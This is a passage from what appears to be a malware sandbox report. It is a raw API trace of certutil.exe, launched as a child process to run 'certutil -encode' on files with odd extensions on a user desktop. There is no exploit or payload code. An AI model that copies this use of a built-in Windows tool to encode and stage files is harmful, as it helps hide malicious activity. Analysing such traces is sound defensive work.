returned 0 [0220.635] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x15, pbEncoded=0x1c075990b50, cbEncoded=0x7af5, dwFlags=0x8000, pDecodePara=0x48f4c7f510, pvStructInfo=0x48f4c7f5a0, pcbStructInfo=0x48f4c7f594 | out: pvStructInfo=0x48f4c7f5a0, pcbStructInfo=0x48f4c7f594) returned 0 [0220.635] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3b, pbEncoded=0x1c075990b50, cbEncoded=0x7af5, dwFlags=0x8000, pDecodePara=0x48f4c7f510, pvStructInfo=0x48f4c7f5a0, pcbStructInfo=0x48f4c7f594 | out: pvStructInfo=0x48f4c7f5a0, pcbStructInfo=0x48f4c7f594) returned 0 [0220.635] CryptMsgOpenToDecode (dwMsgEncodingType=0x10001, dwFlags=0x0, dwMsgType=0x0, hCryptProv=0x0, pRecipientInfo=0x0, pStreamInfo=0x0) returned 0x1c075974bc0 [0220.645] CryptMsgUpdate (hCryptMsg=0x1c075974bc0, pbData=0x1c075990b50, cbData=0x7af5, fFinal=1) returned 0 [0220.645] GetLastError () returned 0x8009310b [0220.645] CryptMsgClose (hCryptMsg=0x1c075974bc0) returned 1 [0220.645] GetFileAttributesExW (in: lpFileName="d_S3PO8QIc.gif.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\d_s3po8qic.gif.sister"), fInfoLevelId=0x0, lpFileInformation=0x48f4c7f5c0 | out: lpFileInformation=0x48f4c7f5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x301a1f60, ftCreationTime.dwHighDateTime=0x1d5eb5a, ftLastAccessTime.dwLowDateTime=0xb6aa1d60, ftLastAccessTime.dwHighDateTime=0x1d5ee1a, ftLastWriteTime.dwLowDateTime=0xb6aa1d60, ftLastWriteTime.dwHighDateTime=0x1d5ee1a, nFileSizeHigh=0x0, nFileSizeLow=0x7af5)) returned 1 [0220.645] _vsnwprintf (in: _Buffer=0x48f4c7f5c8, _BufferCount=0xb, _Format="%d", _ArgList=0x48f4c7f5b8 | out: _Buffer="359") returned 3 [0220.645] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x167, lpBuffer=0x48f4c7f380, cchBufferMax=128 | out: lpBuffer="Input Length = %d") returned 0x11 [0220.645] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x1c075989590 [0220.645] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0220.645] _vsnwprintf (in: _Buffer=0x48f4c7e5b0, _BufferCount=0x1ff, _Format="Input Length = %d", _ArgList=0x48f4c7f608 | out: _Buffer="Input Length = 31477") returned 20 [0220.645] GetFileType (hFile=0x50) returned 0x2 [0220.645] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x48f4c7e5b0*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0x48f4c7e564, lpReserved=0x0 | out: lpBuffer=0x48f4c7e5b0*, lpNumberOfCharsWritten=0x48f4c7e564*=0x14) returned 1 [0220.647] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0220.647] _vsnwprintf (in: _Buffer=0x48f4c7e5b0, _BufferCount=0x1ff, _Format="\n", _ArgList=0x48f4c7f608 | out: _Buffer="\n") returned 1 [0220.647] GetFileType (hFile=0x50) returned 0x2 [0220.647] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x48f4c7e5b0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x48f4c7e564, lpReserved=0x0 | out: lpBuffer=0x48f4c7e5b0*, lpNumberOfCharsWritten=0x48f4c7e564*=0x1) returned 1 [0220.666] GetFileAttributesExW (in: lpFileName="d_S3PO8QIc.gif.Cruel" (normalized: "c:\\users\\fd1hvy\\desktop\\d_s3po8qic.gif.cruel"), fInfoLevelId=0x0, lpFileInformation=0x48f4c7f5c0 | out: lpFileInformation=0x48f4c7f5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae20f028, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0xae20f028, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xae229f3d, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0xa94c)) returned 1 [0220.666] _vsnwprintf (in: _Buffer=0x48f4c7f5c8, _BufferCount=0xb, _Format="%d", _ArgList=0x48f4c7f5b8 | out: _Buffer="361") returned 3 [0220.666] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x169, lpBuffer=0x48f4c7f380, cchBufferMax=128 | out: lpBuffer="Output Length = %d") returned 0x12 [0220.666] LocalAlloc (uFlags=0x0, uBytes=0x26) returned 0x1c075989b00 [0220.666] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0220.666] _vsnwprintf (in: _Buffer=0x48f4c7e5b0, _BufferCount=0x1ff, _Format="Output Length = %d", _ArgList=0x48f4c7f608 | out: _Buffer="Output Length = 43340") returned 21 [0220.666] GetFileType (hFile=0x50) returned 0x2 [0220.666] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x48f4c7e5b0*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0x48f4c7e564, lpReserved=0x0 | out: lpBuffer=0x48f4c7e5b0*, lpNumberOfCharsWritten=0x48f4c7e564*=0x15) returned 1 [0220.668] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0220.668] _vsnwprintf (in: _Buffer=0x48f4c7e5b0, _BufferCount=0x1ff, _Format="\n", _ArgList=0x48f4c7f608 | out: _Buffer="\n") returned 1 [0220.668] GetFileType (hFile=0x50) returned 0x2 [0220.668] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x48f4c7e5b0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x48f4c7e564, lpReserved=0x0 | out: lpBuffer=0x48f4c7e5b0*, lpNumberOfCharsWritten=0x48f4c7e564*=0x1) returned 1 [0220.672] LocalFree (hMem=0x1c075990b50) returned 0x0 [0220.673] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0220.673] _vsnwprintf (in: _Buffer=0x48f4c7f628, _BufferCount=0xb, _Format="%d", _ArgList=0x48f4c7f618 | out: _Buffer="2022") returned 4 [0220.673] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x7e6, lpBuffer=0x48f4c7f3e0, cchBufferMax=128 | out: lpBuffer="%ws: -%ws command completed successfully.") returned 0x29 [0220.673] LocalAlloc (uFlags=0x0, uBytes=0x54) returned 0x1c075969af0 [0220.673] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0220.673] _vsnwprintf (in: _Buffer=0x48f4c7e610, _BufferCount=0x1ff, _Format="%ws: -%ws command completed successfully.", _ArgList=0x48f4c7f668 | out: _Buffer="CertUtil: -encode command completed successfully.") returned 49 [0220.673] GetFileType (hFile=0x50) returned 0x2 [0220.673] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x48f4c7e610*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0x48f4c7e5c4, lpReserved=0x0 | out: lpBuffer=0x48f4c7e610*, lpNumberOfCharsWritten=0x48f4c7e5c4*=0x31) returned 1 [0220.673] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0220.673] _vsnwprintf (in: _Buffer=0x48f4c7e610, _BufferCount=0x1ff, _Format="\n", _ArgList=0x48f4c7f668 | out: _Buffer="\n") returned 1 [0220.674] GetFileType (hFile=0x50) returned 0x2 [0220.674] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x48f4c7e610*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x48f4c7e5c4, lpReserved=0x0 | out: lpBuffer=0x48f4c7e610*, lpNumberOfCharsWritten=0x48f4c7e5c4*=0x1) returned 1 [0220.680] LocalFree (hMem=0x0) returned 0x0 [0220.680] LocalFree (hMem=0x1c075966470) returned 0x0 [0220.680] LocalFree (hMem=0x1c07596aa70) returned 0x0 [0220.680] SetLastError (dwErrCode=0x80070716) [0220.680] _vsnwprintf (in: _Buffer=0x48f4c7f698, _BufferCount=0xb, _Format="%d", _ArgList=0x48f4c7f688 | out: _Buffer="511") returned 3 [0220.680] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1ff, lpBuffer=0x48f4c7f450, cchBufferMax=128 | out: lpBuffer="Command Succeeded") returned 0x11 [0220.680] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x1c075989980 [0220.681] PostQuitMessage (nExitCode=0) [0220.681] GetMessageW (in: lpMsg=0x48f4c7fc90, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x48f4c7fc90) returned 0 [0220.681] LocalFree (hMem=0x1c07597b470) returned 0x0 [0220.681] LocalFree (hMem=0x1c0759899e0) returned 0x0 [0220.681] LocalFree (hMem=0x0) returned 0x0 [0220.681] GetModuleHandleW (lpModuleName="certadm.dll") returned 0x0 [0220.682] GetLastError () returned 0x7e [0220.682] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0220.682] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0220.682] DllMain () returned 0x1 [0220.682] LocalFree (hMem=0x1c07597b650) returned 0x0 [0220.682] LocalFree (hMem=0x1c07596d1c0) returned 0x0 [0220.682] LocalFree (hMem=0x1c075989590) returned 0x0 [0220.682] LocalFree (hMem=0x1c075989b00) returned 0x0 [0220.682] LocalFree (hMem=0x1c075969af0) returned 0x0 [0220.682] LocalFree (hMem=0x1c075989980) returned 0x0 [0220.682] LocalFree (hMem=0x1c075971c80) returned 0x0 [0220.682] LocalFree (hMem=0x1c07596d220) returned 0x0 [0220.683] GetModuleHandleW (lpModuleName="certenroll.dll") returned 0x0 [0220.683] GetLastError () returned 0x7e [0220.683] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0220.683] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0220.683] DllMain () returned 0x1 [0220.683] exit (_Code=0) Thread: id = 47 os_tid = 0xb70 Process: id = "15" image_name = "certutil.exe" filename = "c:\\windows\\system32\\certutil.exe" page_root = "0x14beb000" os_pid = "0xce0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1190" cmd_line = "certutil -encode \"GQcSsii2kuOdN456.odt.Sister\" \"GQcSsii2kuOdN456.odt.Cruel\"" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 48 os_tid = 0xdc8 [0221.836] GetStartupInfoW (in: lpStartupInfo=0xe3f32dfb60 | out: lpStartupInfo=0xe3f32dfb60*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"GQcSsii2kuOdN456.odt.Sister\" \"GQcSsii2kuOdN456.odt.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0221.837] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff70ad80000 [0221.851] __set_app_type (_Type=0x1) [0221.851] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff70ae6cd90) returned 0x0 [0221.851] __wgetmainargs (in: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8, _DoWildCard=0, _StartInfo=0x7ff70aed38b4 | out: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8) returned 0 [0221.854] _onexit (_Func=0x7ff70ae745a0) returned 0x7ff70ae745a0 [0221.855] _onexit (_Func=0x7ff70ae746c0) returned 0x7ff70ae746c0 [0221.855] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0221.855] GetProcAddress (hModule=0x7ffce9120000, lpProcName="WerSetFlags") returned 0x7ffce913a530 [0221.855] WerSetFlags () returned 0x0 [0221.856] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0221.856] __iob_func () returned 0x7ffcea2dea00 [0221.856] _fileno (_File=0x7ffcea2dea30) returned 1 [0221.856] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0221.856] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437" [0221.858] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437" [0221.858] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437" [0221.858] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437" [0221.859] GetConsoleOutputCP () returned 0x1b5 [0221.929] _vsnwprintf (in: _Buffer=0xe3f32dfad0, _BufferCount=0xb, _Format=".%d", _ArgList=0xe3f32df9f8 | out: _Buffer=".437") returned 4 [0221.929] _wsetlocale (category=2, locale=".437") returned="English_United States.437" [0221.929] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0221.929] GetFileType (hFile=0x50) returned 0x2 [0221.929] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0221.929] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0221.929] SetThreadUILanguage (LangId=0x0) returned 0x409 [0222.002] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".exe", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 2 [0222.002] GetCommandLineW () returned="certutil -encode \"GQcSsii2kuOdN456.odt.Sister\" \"GQcSsii2kuOdN456.odt.Cruel\"" [0222.002] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x290bc9bb490 [0222.002] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x290bc9ad070 [0222.002] LocalFree (hMem=0x290bc9bb490) returned 0x0 [0222.002] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x290bc9abdb0 [0222.002] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x290bc9aba50 [0222.002] LocalFree (hMem=0x290bc9abdb0) returned 0x0 [0222.002] LocalFree (hMem=0x290bc9ad070) returned 0x0 [0222.002] LocalFree (hMem=0x0) returned 0x0 [0222.003] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0222.003] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0222.004] GetCommandLineW () returned="certutil -encode \"GQcSsii2kuOdN456.odt.Sister\" \"GQcSsii2kuOdN456.odt.Cruel\"" [0222.004] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x290bc9bb650 [0222.004] GetSystemTime (in: lpSystemTime=0xe3f32df7c0 | out: lpSystemTime=0xe3f32df7c0*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x12, wMinute=0x30, wSecond=0x38, wMilliseconds=0x220)) [0222.004] SystemTimeToFileTime (in: lpSystemTime=0xe3f32df7c0, lpFileTime=0xe3f32df7b8 | out: lpFileTime=0xe3f32df7b8) returned 1 [0222.004] FileTimeToLocalFileTime (in: lpFileTime=0xe3f32df7b8, lpLocalFileTime=0xe3f32df780 | out: lpLocalFileTime=0xe3f32df780) returned 1 [0222.004] FileTimeToSystemTime (in: lpFileTime=0xe3f32df780, lpSystemTime=0xe3f32df4f0 | out: lpSystemTime=0xe3f32df4f0) returned 1 [0222.004] GetDateFormatW (in: Locale=0x400, dwFlags=0x1, lpDate=0xe3f32df4f0, lpFormat=0x0, lpDateStr=0xe3f32df600, cchDate=128 | out: lpDateStr="4/16/2020") returned 10 [0222.005] GetTimeFormatW (in: Locale=0x400, dwFlags=0x2, lpTime=0xe3f32df4f0, lpFormat=0x0, lpTimeStr=0xe3f32df500, cchTime=128 | out: lpTimeStr="8:48 PM") returned 8 [0222.005] _vsnwprintf (in: _Buffer=0xe3f32df50e, _BufferCount=0x78, _Format=" %02u.%03us", _ArgList=0xe3f32df4d8 | out: _Buffer=" 56.544s") returned 8 [0222.005] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x290bc9be090 [0222.005] SetLastError (dwErrCode=0x80070716) [0222.005] _vsnwprintf (in: _Buffer=0xe3f32df588, _BufferCount=0xb, _Format="%d", _ArgList=0xe3f32df578 | out: _Buffer="948") returned 3 [0222.005] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x3b4, lpBuffer=0xe3f32df340, cchBufferMax=128 | out: lpBuffer="Begin") returned 0x5 [0222.005] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x290bc9bb4b0 [0222.005] LocalAlloc (uFlags=0x0, uBytes=0x640) returned 0x290bc9b4490 [0222.005] LocalFree (hMem=0x290bc9be090) returned 0x0 [0222.006] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xe3f32df830 | out: lpSystemTimeAsFileTime=0xe3f32df830*(dwLowDateTime=0xaeef3d49, dwHighDateTime=0x1d6141f)) [0222.006] GetLocalTime (in: lpSystemTime=0xe3f32df868 | out: lpSystemTime=0xe3f32df868*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x14, wMinute=0x30, wSecond=0x38, wMilliseconds=0x222)) [0222.006] SystemTimeToFileTime (in: lpSystemTime=0xe3f32df868, lpFileTime=0xe3f32df840 | out: lpFileTime=0xe3f32df840) returned 1 [0222.006] CompareFileTime (lpFileTime1=0xe3f32df840, lpFileTime2=0xe3f32df830) returned 1 [0222.006] _vsnwprintf (in: _Buffer=0xe3f32df878, _BufferCount=0x13, _Format="GMT %s %.2f", _ArgList=0xe3f32df808 | out: _Buffer="GMT + 2.00") returned 10 [0222.006] LocalFree (hMem=0x290bc9bb650) returned 0x0 [0222.006] GetModuleHandleW (lpModuleName="certca.dll") returned 0x7ffcc9760000 [0222.006] FindResourceW (hModule=0x7ffcc9760000, lpName=0x1, lpType=0x10) returned 0x7ffcc9820090 [0222.006] LoadResource (hModule=0x7ffcc9760000, hResInfo=0x7ffcc9820090) returned 0x7ffcc98200b0 [0222.006] LockResource (hResData=0x7ffcc98200b0) returned 0x7ffcc98200b0 [0222.007] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="VS_VERSION_INFO", cchCount1=-1, lpString2="VS_VERSION_INFO", cchCount2=-1) returned 2 [0222.007] _vsnwprintf (in: _Buffer=0x7ff70aed6890, _BufferCount=0x3f, _Format="%u.%u.%u.%u", _ArgList=0xe3f32df8a8 | out: _Buffer="10.0.15063.447") returned 14 [0222.007] GetACP () returned 0x4e4 [0222.007] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0222.007] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x290bc9bb8f0 [0222.007] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x290bc9bb8f0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0222.007] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x290bc9be090 [0222.007] _vsnwprintf (in: _Buffer=0x290bc9be090, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xe3f32df8f8 | out: _Buffer="10.0.15063.447 retail544s") returned 21 [0222.007] LocalFree (hMem=0x290bc9bb8f0) returned 0x0 [0222.007] LocalFree (hMem=0x0) returned 0x0 [0222.007] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0222.007] GetACP () returned 0x4e4 [0222.007] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0222.007] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x290bc9bb950 [0222.007] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x290bc9bb950, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0222.007] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x290bc9be050 [0222.008] _vsnwprintf (in: _Buffer=0x290bc9be050, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xe3f32df8f8 | out: _Buffer="10.0.15063.447 retailEvent") returned 21 [0222.008] LocalFree (hMem=0x290bc9bb950) returned 0x0 [0222.008] LocalFree (hMem=0x0) returned 0x0 [0222.008] GetACP () returned 0x4e4 [0222.008] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0222.008] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x290bc9bb590 [0222.008] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x290bc9bb590, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0222.008] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x290bc9be0d0 [0222.008] _vsnwprintf (in: _Buffer=0x290bc9be0d0, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xe3f32df928 | out: _Buffer="10.0.15063.447 retail") returned 21 [0222.008] LocalFree (hMem=0x290bc9bb590) returned 0x0 [0222.008] LocalFree (hMem=0x290bc9be090) returned 0x0 [0222.008] LocalFree (hMem=0x290bc9be050) returned 0x0 [0222.008] LocalFree (hMem=0x290bc9be0d0) returned 0x0 [0222.008] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0222.008] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0222.009] GetStockObject (i=0) returned 0x900010 [0222.009] RegisterClassW (lpWndClass=0xe3f32dfa50) returned 0xc1a2 [0222.009] CreateWindowExW (dwExStyle=0x0, lpClassName="CertUtil", lpWindowName="CertUtil Application", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff70ad80000, lpParam=0x0) returned 0x1802be [0222.134] NtdllDefWindowProc_W () returned 0x0 [0222.135] NtdllDefWindowProc_W () returned 0x1 [0222.142] NtdllDefWindowProc_W () returned 0x0 [0222.152] UpdateWindow (hWnd=0x1802be) returned 1 [0222.153] PostMessageW (hWnd=0x1802be, Msg=0x400, wParam=0x0, lParam=0x290bc9a217e) returned 1 [0222.153] GetMessageW (in: lpMsg=0xe3f32dfaa0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xe3f32dfaa0) returned 1 [0222.153] TranslateMessage (lpMsg=0xe3f32dfaa0) returned 0 [0222.153] DispatchMessageW (lpMsg=0xe3f32dfaa0) returned 0x0 [0222.153] NtdllDefWindowProc_W () returned 0x0 [0222.153] GetMessageW (in: lpMsg=0xe3f32dfaa0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xe3f32dfaa0) returned 1 [0222.153] TranslateMessage (lpMsg=0xe3f32dfaa0) returned 0 [0222.153] DispatchMessageW (lpMsg=0xe3f32dfaa0) returned 0x0 [0222.153] LocalAlloc (uFlags=0x0, uBytes=0x86) returned 0x290bc9b0cc0 [0222.153] LocalAlloc (uFlags=0x0, uBytes=0x92) returned 0x290bc9abf40 [0222.153] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="p", cchCount2=-1) returned 1 [0222.154] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="pin", cchCount2=-1) returned 1 [0222.154] SetLastError (dwErrCode=0x80070716) [0222.154] _vsnwprintf (in: _Buffer=0xe3f32df4a8, _BufferCount=0xb, _Format="%d", _ArgList=0xe3f32df498 | out: _Buffer="465") returned 3 [0222.154] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1d1, lpBuffer=0xe3f32df260, cchBufferMax=128 | out: lpBuffer="Command Line") returned 0xc [0222.154] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x290bc9ab930 [0222.154] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0222.154] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0222.154] GetEnvironmentVariableW (in: lpName="certsrv_rawhex", lpBuffer=0xe3f32df240, nSize=0x104 | out: lpBuffer="\x01") returned 0x0 [0222.154] GetLastError () returned 0xcb [0222.155] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0222.155] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0222.155] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0222.155] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0222.155] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0222.155] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0222.155] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0222.155] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0222.155] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0222.155] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0222.155] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0222.155] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0222.155] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0222.155] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0222.155] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0222.155] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0222.155] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0222.155] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0222.155] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0222.155] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0222.155] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0222.156] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", ulOptions=0x0, samDesired=0x20019, phkResult=0xe3f32def08 | out: phkResult=0xe3f32def08*=0x23c) returned 0x0 [0222.156] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x290bc9b5470 [0222.156] RegQueryValueExW (in: hKey=0x23c, lpValueName="RawHex", lpReserved=0x0, lpType=0xe3f32df478, lpData=0xe3f32df4a8, lpcbData=0xe3f32df470*=0x4 | out: lpType=0xe3f32df478*=0x0, lpData=0xe3f32df4a8*=0x0, lpcbData=0xe3f32df470*=0x4) returned 0x2 [0222.156] LocalFree (hMem=0x290bc9b5470) returned 0x0 [0222.156] RegCloseKey (hKey=0x23c) returned 0x0 [0222.156] LocalFree (hMem=0x0) returned 0x0 [0222.156] CryptFindOIDInfo (dwKeyType=0x1, pvKey=0x7ff70ae80270, dwGroupId=0x7) returned 0x290bc9cd090 [0222.206] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount1=-1, lpString2="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount2=-1) returned 2 [0222.206] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 1 [0222.206] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 1 [0222.206] lstrcmpW (lpString1="encode", lpString2="uSAGE") returned -1 [0222.206] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="gp", cchCount2=-1) returned 1 [0222.206] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", 